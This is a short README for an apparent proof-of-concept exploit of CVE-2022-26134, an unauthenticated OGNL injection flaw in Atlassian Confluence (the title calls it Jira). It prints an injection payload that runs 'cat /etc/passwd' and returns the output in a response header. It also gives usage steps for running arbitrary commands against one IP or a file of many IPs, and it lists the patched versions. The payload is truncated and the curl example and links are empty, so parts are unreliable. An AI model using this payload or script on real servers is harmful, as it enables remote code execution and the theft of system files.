# CVE-2022-26134 by 1vere$k
Just simple PoC for the Atlassian Jira exploit. Provides code execution for unauthorised user on a server.

**CVE-2022-26134 - OGNL injection vulnerability.**

Script proof of concept that exploits the remote code execution vulnerability affecting Atlassian Confluence 7.18 and lower products. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.

## Payload

${("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

**Example with CURL command:**

curl --head -k "" 

Then, the result of the command will be reflected in the parameter `X-Cmd-Response` in the response header.

**Mitigations guidelines from vendors**

Follow the official recommendations from Atlassian:

## Patched Versions

Atlassian released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contain a patch for this issue.

## Usage 
1. git clone
2. cd cve-2022-26134
3. pip install -r requirements.txt
4. Ex#1: python3 <IP> <COMMAND> - command is optional - default will be set as "whoami" just to check if your server is vulnerable
5. Ex#2: 4. Ex#1: python3 <FILE-WITH-IPs> <COMMAND>

## Contact

You are free to contact me via [Keybase]( for any details.